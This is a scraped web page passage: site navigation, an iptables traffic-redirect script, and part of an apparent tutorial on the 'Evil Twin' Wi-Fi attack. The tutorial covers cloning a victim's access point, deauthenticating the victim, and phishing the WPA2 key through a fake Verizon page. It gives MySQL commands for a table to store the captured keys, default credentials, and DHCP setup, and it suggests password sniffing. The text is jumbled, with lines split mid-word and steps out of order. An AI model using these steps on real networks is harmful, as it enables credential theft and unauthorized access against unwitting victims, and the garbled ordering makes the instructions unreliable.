Documenti di Didattica
Documenti di Professioni
Documenti di Cultura
/bin/sh
PROXY_IP=[IP]
PROXY_PORT=[PORT]
LAN_IP=`nvram get lan_ipaddr`
LAN_NET=$LAN_IP/`nvram get lan_netmask`
iptables -t nat -A PREROUTING -i br0 -s $LAN_NET -d ! $LAN_IP -p tcp --dport 80
-j DNAT --to $PROXY_IP:$PROXY_PORT
iptables -t nat -A POSTROUTING -o br0 -s $PROXY_IP -p tcp -d $LAN_NET -j SNAT -to $PROXY_IP
iptables -A FORWARD -i vlan1 -o br0 -s $LAN_NET -d $PROXY_IP -p tcp --dport $PRO
XY_PORT -j ACCEPT
In an ealier post, we've seen how to crack WPA-2 network keys using a dictionary
.
While that technique works, it could take an awful long time, especially when br
ute forcing.
On this technique, named 'Evil Twin', we take a different perspective to the att
ack. Using a powerful long range wireless card (Alfa AWUS036NH), we clone the ta
rget network to confuse our victim. Then, we deauthenticate the victim from his
own wireless network and wait until he connects to our access point - which look
s exactly like his. :)
When the victim connects, he is redirected to a service page asking for the WPA2 key in order to access the internet. As soon as we get the key, you can either
allow the victim to use the network (maybe improvise some password sniffing?) o
r just bring it down manually.
For this example I created a service page based on Verizon ISP. The files are pl
aced at the default location (/var/www/). I created a database called 'wpa2', wh
ich can be done with the following commands:
Login to MySQL:
mysql -u root -p
Note: Default backtrack user/pass are root/toor
Create the database:
create database wpa2;
use wpa2;
create table content(key1 VARCHAR(64), key2 VARCHAR(64));
Finally, start apache and mysql services and check everything works, by going ty
ping localhost on a web-browser.
apt-get install dhcp3-server -y
mv etc/dhcp3/dhcp.conf /etc/dhcp3/dhcp.conf.backup
gedit etc/dhcp3/dhcp.conf
Commands:
Install dhcp3 and create config file: